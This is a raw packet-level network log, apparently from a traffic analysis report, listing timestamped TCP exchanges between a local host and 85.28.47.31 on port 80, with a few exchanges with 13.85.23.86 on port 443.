                                                                                        Jul 24, 2024 07:14:18.993379116 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.993396044 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.993423939 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.993499994 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.993550062 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.993551970 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.993582010 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.993602037 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.993622065 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.993662119 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.993695021 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.993712902 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.993730068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.993748903 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.993772984 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.993774891 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.993823051 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.993853092 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.993886948 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.993905067 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.993936062 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994162083 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994194031 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994219065 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994227886 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994236946 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994261026 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994276047 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994312048 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994349003 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994383097 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994401932 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994416952 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994421005 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994467974 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994469881 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994501114 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994519949 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994533062 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994554996 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994566917 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994577885 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994600058 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994613886 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994632959 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994651079 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994667053 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994687080 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994704008 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994721889 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994736910 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994745970 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994771004 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994786978 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994806051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.994822025 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.994857073 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.995037079 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.995068073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.995100021 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.995114088 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.995135069 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.995135069 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.995155096 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.995171070 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.995182991 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.995203018 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.995219946 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.995235920 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.995255947 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.995270967 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.995279074 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.995306015 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.995321035 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.995362043 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.995753050 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.995841980 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.995874882 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.995882034 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.995882034 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.995917082 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.995925903 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.995959997 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.995975018 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.995994091 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996011019 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996043921 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996043921 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996076107 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996089935 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996109962 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996128082 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996143103 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996160030 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996176004 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996189117 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996208906 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996221066 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996243000 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996258974 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996275902 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996294975 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996313095 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996323109 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996345997 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996362925 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996380091 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996390104 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996412992 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996438980 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996447086 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996464014 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996505976 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996541977 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996576071 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996588945 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996608973 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996629000 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996643066 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996658087 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996695995 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996757984 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996789932 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996807098 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996822119 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996840954 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996855021 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996867895 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996886969 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996901989 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996920109 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996934891 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996953011 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.996975899 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.996987104 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997018099 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997020960 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997036934 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997054100 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997070074 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997087955 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997103930 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997121096 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997132063 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997154951 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997165918 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997188091 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997203112 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997222900 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997245073 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997256041 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997267962 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997288942 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997311115 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997323036 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997339010 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997374058 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997643948 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997677088 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997697115 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997709036 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997725010 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997742891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997765064 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997775078 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997788906 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997808933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997828007 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997842073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997855902 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997875929 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997891903 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997909069 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997922897 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997942924 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997956991 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.997977972 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.997992039 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.998011112 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.998027086 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.998044014 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.998060942 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.998079062 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.998096943 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.998111963 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.998130083 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.998143911 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.998161077 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.998212099 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.998430014 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.998462915 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.998486042 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.998495102 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.998506069 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.998528957 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.998544931 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.998563051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.998578072 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.998596907 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.998606920 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.998629093 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.998646021 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.998667955 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.998699903 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.998750925 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.083782911 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.083867073 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.083870888 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.083904028 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.083923101 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.083950996 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.083957911 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.083992004 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.084008932 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.084028006 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.084062099 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.084090948 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.084091902 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.084095955 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.084115982 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.084136963 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.084177017 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.084209919 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.084218025 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.084249973 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.084707975 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.084741116 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.084748983 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.084774017 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.084779024 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.084806919 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.084809065 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.084841967 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.084845066 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.084876060 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.084878922 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.084908962 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.084912062 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.084947109 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.085030079 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.085063934 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.085067034 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.085097075 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.085098982 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.085134029 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.085176945 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.085216999 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.085227966 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.085262060 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.085267067 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.085295916 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.085298061 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.085334063 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.085671902 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.085704088 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.085717916 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.085737944 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.085741043 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.085772038 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.085773945 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.085803986 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.085805893 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.085836887 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.085839033 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.085870028 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.085872889 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.085905075 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.085906029 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.085941076 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.086230993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.086263895 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.086276054 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.086297035 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.086299896 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.086329937 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.086333036 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.086363077 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.086364985 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.086395979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.086400986 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.086427927 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.086432934 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.086463928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.086467028 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.086498976 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.086513042 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.086549044 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.090010881 CEST4434971313.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.090132952 CEST49713443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:19.120249987 CEST49713443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:19.120336056 CEST4434971313.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.121233940 CEST4434971313.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.175167084 CEST49713443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:19.190727949 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.198484898 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.212963104 CEST49713443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:19.256531000 CEST4434971313.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.374381065 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.374495983 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.374928951 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.374963999 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.374989033 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.375015020 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.376727104 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.376760960 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.376821995 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.378703117 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.378739119 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.378772974 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.378798962 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.380774975 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.380810022 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.380856991 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.380887032 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.382782936 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.382817030 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.382858038 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.382858038 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.384388924 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.384424925 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.384458065 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.384460926 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.384481907 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.384506941 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.386117935 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.386153936 CEST804971185.28.47.31192.168.2.6
